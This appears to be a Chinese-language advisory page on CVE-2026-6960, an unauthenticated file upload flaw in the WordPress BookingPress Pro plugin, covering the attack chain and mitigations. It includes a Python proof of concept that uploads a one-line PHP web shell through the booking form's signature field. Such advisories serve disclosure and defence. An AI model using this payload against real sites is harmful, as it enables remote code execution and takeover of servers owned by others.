CVE-2026-6960 CVSS 9.8 严重

CVE-2026-6960 WordPress BookingPress Pro任意文件上传漏洞

披露日期: 2026-05-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6960

漏洞类型

任意文件上传

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress BookingPress Pro Plugin

漏洞概述

WordPress BookingPress Pro插件在5.6及之前的版本中存在严重的任意文件上传漏洞。该漏洞源于`bookingpress_validate_submitted_booking_form_func`函数中缺失关键的文件类型验证机制。未经身份认证的远程攻击者可利用此缺陷，向受影响网站服务器上传任意恶意文件，从而导致服务器被完全控制并执行远程代码。此漏洞的利用需满足特定条件，即管理员需在预约表单中配置了签名自定义字段。

技术细节

该漏洞的核心原因在于BookingPress Pro插件处理预约表单提交时的安全疏忽。具体来说，`bookingpress_validate_submitted_booking_form_func`函数负责处理用户提交的数据，但在处理签名自定义字段时，未对上传的文件进行MIME类型或扩展名的严格验证。攻击者可以构造恶意的HTTP POST请求，将包含Web Shell的图片或脚本文件伪装成合法的签名文件上传。由于缺乏验证，该文件会被保存到服务器可访问的目录中。攻击者随后通过浏览器访问该文件路径，即可在服务器端执行恶意代码，获取系统权限。

攻击链分析

STEP 1

侦察

攻击者识别目标网站是否使用了WordPress，并确认安装了BookingPress Pro插件（版本<=5.6），同时探测预约表单中是否启用了“签名自定义字段”。

STEP 2

漏洞利用

攻击者构造特制的HTTP POST请求，向预约表单提交接口发送数据，并在`signature_custom_field`字段中附带包含恶意代码的文件（如.php webshell）。

STEP 3

文件上传

由于服务端缺失文件类型验证，恶意文件被成功保存到Web服务器的可访问目录中。

STEP 4

命令执行

攻击者通过浏览器访问已上传文件的URL，触发服务器端解析恶意代码，从而获取服务器权限并执行任意系统命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url):
    # Target endpoint typically processes booking form submissions
    url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Payload data mimicking a booking submission with a malicious file
    data = {
        "action": "bookingpress_submit_booking_form",
        "bookingpress_form_data": "..." # JSON encoded form data
    }
    
    # Malicious file upload (e.g., PHP shell)
    files = {
        "signature_custom_field": (
            "exploit.php", 
            "<?php system($_GET['cmd']); ?>", 
            "application/octet-stream"
        )
    }
    
    try:
        response = requests.post(url, data=data, files=files)
        if response.status_code == 200:
            print("[+] Payload sent successfully. Check the upload path.")
        else:
            print(f"[-] Failed. Status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

# Usage
# exploit("http://target-site.com")

影响范围

BookingPress Pro <= 5.6

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时从预约表单中移除“签名自定义字段”功能，以阻断漏洞利用路径。同时，应在Web服务器（如Nginx或Apache）配置中，禁止上传目录（通常为wp-content/uploads）执行任何脚本文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表